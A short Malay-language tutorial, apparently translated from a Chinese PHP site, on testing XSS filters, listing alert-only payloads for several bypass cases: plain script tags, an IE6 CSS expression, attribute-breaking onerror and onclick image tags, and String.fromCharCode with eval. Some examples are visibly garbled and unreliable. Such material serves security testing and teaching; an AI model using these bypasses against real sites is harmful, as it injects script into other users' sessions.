Bagaimanakah ujian kecil xss dilakukan?

• Tiada sekatan keselamatan, gunakan terus

<script>alert(/xss/);</script>

• Sekatan: Hanya CSS boleh digunakan, tag html tidak dibenarkan

Kami tahu bahawa ungkapan boleh digunakan untuk membina XSS, tetapi ia hanya boleh diuji di bawah IE. Oleh itu, sila lakukan ujian berikut dalam IE6.

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

• Sekatan: HTML terlepas dan teg Imej tersedia .

Aksara yang dimasukkan dalam ujian akan dimasukkan ke dalam alamat src, jadi anda boleh menggunakan protokol pseudo untuk memintasnya.

Masukkan

alert( /xss/);

terus atau anda boleh menggunakan acara untuk memintas, hanya perhatikan pernyataan penutup, seperti berikut:

1" onerror=alert(/xss/) ; var a="1

• Sekatan: Penapisan kata kunci digunakan.

Saya mengujinya, kebanyakannya ditapis, ada yang tidak ditapis, selepas ujian skrip/onerror ditapis, tetapi onclick tidak ditapis, gunakan acara onclick untuk memintas

<img src=# onclick=alert(/xss/);>

• Sekatan: Gunakan tanda miring tambahan untuk melarikan diri daripada aksara ciri

Maksudnya, petikan tunggal, petikan berganda, dsb. tidak boleh muncul dalam pernyataan XSS kami. Watak ciri.

Gunakan

<script>alert(/xss/);</script>

terus untuk memintas

atau gunakan kaedah String.fromCharCode, seperti berikut:

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

Atas ialah kandungan terperinci Bagaimanakah ujian kecil xss dilakukan?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!